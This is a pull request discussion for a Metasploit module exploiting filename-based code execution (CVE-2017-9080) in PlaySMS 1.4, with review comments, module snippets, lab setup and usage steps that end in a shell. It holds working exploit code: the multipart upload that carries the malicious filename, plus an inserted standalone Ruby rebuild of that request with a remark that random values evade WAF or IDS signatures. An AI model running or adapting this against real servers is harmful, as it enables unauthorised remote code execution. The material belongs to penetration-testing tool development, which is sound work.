playsms_filename_exec.rb #9944
Conversation
PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
doc update
Hey @bcoles, I have added the doc.
Review comments. Also, please change the indentation from 4 spaces to 2 spaces to follow the style guide.
'DarkS3curity' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
Add CVE reference
CVE-2017-9080
12. Do: `exploit`
13. You should get a shell.

## Options
The Options section can probably be removed in this case.
# setup POST request.
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token
post_data.add_part("agent22", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload
Can the data agent22 be randomized or is that required? Same question for fncsv.
post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra
Can fncsv_dup be randomized?
data = post_data.to_s

print_status('Trying to upload file with malicious Filename Field....')
Consider changing to vprint_status.
Hey @jrobles-r7, thanks for the review and for giving suggestions. I have made changes according to your suggestions. 👍
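The multipart upload discussed in the review above, as an added example that is not part of the module, of Metasploit, or of the PlaySMS project: it builds the same three parts (the X-CSRF-Token field, the fncsv file part whose filename carries the payload, and the fncsv_dup flag) with the Ruby standard library instead of Rex::MIME::Message, randomizes the file content and the boundary as the reviewer asks, and includes a small parser that reads the filename back out of the body. The field names are taken from the snippet above; the function names, the default random file content, the token and filename values in the usage call, and the decision to only build the body rather than send it are assumptions of this example.

```ruby
# Added example, not the module's own code: assemble the sendfromfile.php
# multipart/form-data upload with only the Ruby standard library.
require 'securerandom'

CRLF = "\r\n".freeze

# Builds one multipart/form-data body (RFC 7578 layout). Each part is a hash:
#   { name: 'field', value: '...' }                              -> plain field
#   { name: 'field', filename: '...', value: '...',
#     content_type: 'application/octet-stream' }                 -> file field
# The filename is written verbatim; no quoting is applied, because the
# filename is the payload carrier here.
def multipart_body(parts, boundary)
  body = +''
  parts.each do |part|
    body << "--#{boundary}#{CRLF}"
    disposition = +"form-data; name=\"#{part[:name]}\""
    disposition << "; filename=\"#{part[:filename]}\"" if part[:filename]
    body << "Content-Disposition: #{disposition}#{CRLF}"
    body << "Content-Type: #{part[:content_type]}#{CRLF}" if part[:content_type]
    body << CRLF << part[:value].to_s << CRLF
  end
  body << "--#{boundary}--#{CRLF}"
end

# Assembles the upload the module sends: CSRF token, the fncsv file part whose
# *filename* is the malicious value, and fncsv_dup=1. The file content and the
# boundary default to random values (the reviewer's question about the fixed
# "agent22" string); both can be pinned for reproducible tests.
# Returns the Content-Type header value and the body, nothing is sent.
def build_upload(csrf_token, evil_filename,
                 file_content: SecureRandom.alphanumeric(12),
                 boundary: "----#{SecureRandom.hex(16)}")
  parts = [
    { name: 'X-CSRF-Token', value: csrf_token },
    { name: 'fncsv', filename: evil_filename, value: file_content,
      content_type: 'application/octet-stream' },
    { name: 'fncsv_dup', value: '1' }
  ]
  {
    content_type: "multipart/form-data; boundary=#{boundary}",
    body: multipart_body(parts, boundary)
  }
end

# Reads the filename back out of the named file part, which is the value
# sendfromfile.php handles; useful to confirm what the target will see.
def upload_filename(body, field: 'fncsv')
  m = body.match(/Content-Disposition: form-data; name="#{Regexp.escape(field)}"; filename="([^"]*)"/)
  m && m[1]
end

if __FILE__ == $PROGRAM_NAME
  # Hypothetical token and filename, constructed for the demonstration only.
  req = build_upload('tok123', 'evil.php')
  puts req[:content_type]
  puts req[:body]
  puts "filename seen by target: #{upload_filename(req[:body])}"
end
```

Pinning `file_content` and `boundary` makes the body byte-for-byte reproducible, which is what a module test wants; leaving them random is what a live run wants, since a fixed string such as `agent22` is a trivial signature for a WAF or IDS to match on.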
Release Notes
The PlaySMS module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in the sendfromfile.php file. Authenticated users can upload a file and rename the file with a malicious payload.
Description
This module exploits an authenticated file upload in PlaySMS version 1.4 in which the filename parameter leads to remote code execution. The issue is caused by improper filename handling in the sendfromfile.php file. Authenticated users can upload a file and rename it with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB 42044.
NOTE: This module was already submitted as a pull request, but for some reason it was closed by the author. Check #9840.
Vulnerable Application
Available at Exploit-DB
Vulnerable application installation setup.
Download the application:
wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
Extract:
tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
Move into the web directory:
mv playsms-1.4/web/* /var/www/html/
Create the config file:
cp /var/www/html/config-dist.php /var/www/html/config.php
Change owner:
chown -R www-data:www-data /var/www/html/
Set the DB credentials in config.php, then import playsms-1.4/db/playsms.sql into your playsms database.
Now visit: http://localhost/
Verification Steps
use exploit/multi/http/playsms_filename_exec
set rport <port>
set rhost <ip>
set targeturi SecreTSMSgatwayLogin
set username touhid
set password diana
check
set lport <port>
set lhost <ip>
exploit
Scenarios
PlaySMS on Ubuntu Linux